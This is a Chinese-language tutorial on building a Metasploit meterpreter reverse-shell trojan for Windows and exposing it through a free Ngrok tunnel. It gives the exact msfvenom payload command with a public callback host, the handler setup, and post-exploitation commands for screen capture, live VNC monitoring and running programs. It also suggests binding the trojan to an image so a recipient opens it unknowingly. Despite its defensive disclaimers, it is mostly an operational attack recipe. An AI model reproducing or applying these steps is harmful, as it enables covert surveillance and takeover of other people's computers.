MSF+内网穿透 实现远程渗透
网络攻防如同打仗 知己知彼百战不殆
要想学会防守必先知道敌人如何进攻
此教程的远端测试全是我的好友帮助测试
并非实际攻击!!!
写一篇远程的渗透教程给大家
当然不是为了教大家去黑别人电脑
而是让大家明白原理,懂得如何防范,再三强调!!!
使用此教程用在不正当地方造成的后果与本人无关!!!
接下来开始本次教程
先给大家展示一下效果吧!基于此程序可以监视对方电脑,实时屏幕抓取,甚至实时屏幕监测,还有创建账户,操控电脑等强悍功能。
(功能很多这里就不过赘述了)
所以一般别人给你发的陌生程序千万不要去点!!!!!!!
手机和电脑一个道理,今天就拿电脑端给大家进行讲解,教程中如果出现错误,或者口误的地方,希望大家可以帮我指明,我会积极改正,谢谢大家!!!
不废话了,开始
这个就是通过screenshot命令进行远端屏幕截取的(当时是我的一个朋友帮我进行的远端测试,这是当时他的实时屏幕)
当然还有很多更强悍的命令,在后面再为大家一一介绍。
**首先介绍需要的的工具!!!
(这里就默认大家都有Linux了)
1.MSF本篇文章的重点工具
.
2.Sunny-Ngrok
(内网穿透工具,因为做好的程序需要对方进行回连,而对方又处在外网,所以想要访问你的主机,必须通过内网穿透才可以连接到你的主机,被你监测和控制)
3.win7虚拟机
(这里用作测试用,你可以在自己的物理机里面测试)
一:内网穿透的注册和隧道的使用
第一步打开Sunny官网,超级链接已部署,直接点就可以。然后果断点击注册。
因为我已经注册过了这里就不给大家演示了,不会注册就直接放弃吧,百度估计也救不了你了。
接下来直接点击隧道管理,然后点击开通隧道,作为白嫖党,当然不会让你们花钱的,直接拖到最下面
发现有个0元的,我的天这年头还有免费的,立即购买直接点下去,然后点击确认。
协议我们选择tcp,隧道名字自己随便取一个,远程端口在10000-11000之间选择,如果被用了的话,旁边有个查看可用端口,点击一下然后随便选取一个就可以。
接下来还有一个 本地端口,这里就是你虚拟机的端口,我这里是kali ,所以我看一下我kali的本地ip地址,在kali终端中输入 ifconfig 然后看一下你的ip地址如下图。
然后端口的话,我这里选择的是22端口,所以我填完后信息如下。大家模仿即可。因为我注册过一次,所以这些信息是我的端口的信息,就不再注册了。
接下来我们为kali下载Sunny的启动端,点击即可。自己下载所对应的版本,因为我的是64位的Linux,所以我之间下载64位的。
wget http://hls.ctopus.com/sunny/linux_amd64.zip?v=2
64位的Linux直接在终端输入以上代码即可下载。下载完后的压缩包在你的主目录中,点开即可看见。
下载下的文件名字可能会不一样你们自己找一找,然后对文件进行解压缩,将文件就解压缩进主目录即可。
右键文件夹,提取到此次即可,然后会多出来一个跟压缩包名字一样的文件夹,然后点开进去将里面的Sunny文件移到最外层的目录。
然后返回你刚刚注册的那个网站,登录上去,然后找见隧道管理,点击然后找见你的id,还有端口,将它们记下来。我这里的端口就是后面的10030.
然后在一个新的终端中,输入以下命令。
./sunny clientid bbbbdwadawd(这个是你刚刚通道的id)
出现这个界面证明你的内网穿透服务正常启动了,到此内网渗透的大部分工作完成了,接下来我们制作远程木马。
二.利用MSF制作远程木马
这步相对教为简单,大家按命令输入即可。
新开一个终端窗口
msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp LHOST=free.idcfengye.com LPORT=10030 -f exe -o 木马名称.exe
这里的LHOST=后面的值不需要改,
LPORT=后面的值改为刚刚注册网页的隧道端口(就是第一个提示在10000-11000之间选择的那个端口)
木马名称自己写一个就好。
出现如下提示证明你的木马生成成功了,就在你的主目录下面。
这个就是我生成的木马,到这里木马就制作完成了,然后接下将这个木马移到我们测试的主机中,我这里是用win7测试的,所以以win7为例。
三.利用MSF和win7测码
至于如何将文件从Linux中移出来,且移到其它地方,这里就不再赘述了,本白这里用的是 Vm Tools ,当然方法有很多,个人认为这个比较无脑点,哈哈哈。
我把文件名字改成了成品,看的舒服点 ,哈哈哈。
然后切回到我们的linx界面
在终端中挨个输入如下命令
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.187.131 //这个就是你刚刚网站的填写的IP
set lport 22 //这个就是刚刚IP后面跟着的端口
exploit
以上命令请一条一条运行 !!!
运行完这些命令后你会出现如下界面
然后返回我们的win7,运行刚刚的木马程序。
出现这个界面证明对方上线了,此时你就可以进行操控了。
execute -f calc.exe
打开对方电脑的计算器。
这边提示创建成功,打开我们的win7看一下。
果不其然,win7的计算器自己开启了,然而这条命令只是冰山一角,命令还有好多,这里就不给大家测了,给大家写几条常用的吧。
sysinfe // 查看对面电脑配置
screenshot //屏幕截图 截取对方电脑的屏幕
run vnc //实时监控对面屏幕
execute -f calc.exe //开计算器
因为这只是教大家原理和简单的方法,好多命令这里就不给大家说了,大家可以自行百度什么的。这个木马因为有了内网穿透是可以进行远端执行的。
当然这个木马,检测是肯定过不了的,不要想着怎么去坑害别人,
一定要坚守正义!!!!
一定要坚守正义!!!!
一定要坚守正义!!!!
至于如何过检测软件,大家就自己去摸索吧,这里不教给大家了,如果是为了给朋友发去,然后装X的话,你可以和一个图片什么的捆绑起来,看起来 就 有内味了,这里简单捆绑了一下,给大家看下效果。
点击软件后会出现上面的图片,闪一下,当然这需要提前将照片打包成 .exe 的格式的文件。好了好了 就写这么多了。
~
~
一个对网安疯狂热爱的小白的学习经验
希望能够让想学习网安的人提起一些兴趣
如果文章中有错误,或者不妥的地方请直接在评论中指明,本白会积极修改,还有就是想找个大佬带带我 毕竟一个学还是毕竟难的
~
~
如果你学到了一些东西请帮忙点个赞
真的很重要
谢谢大家
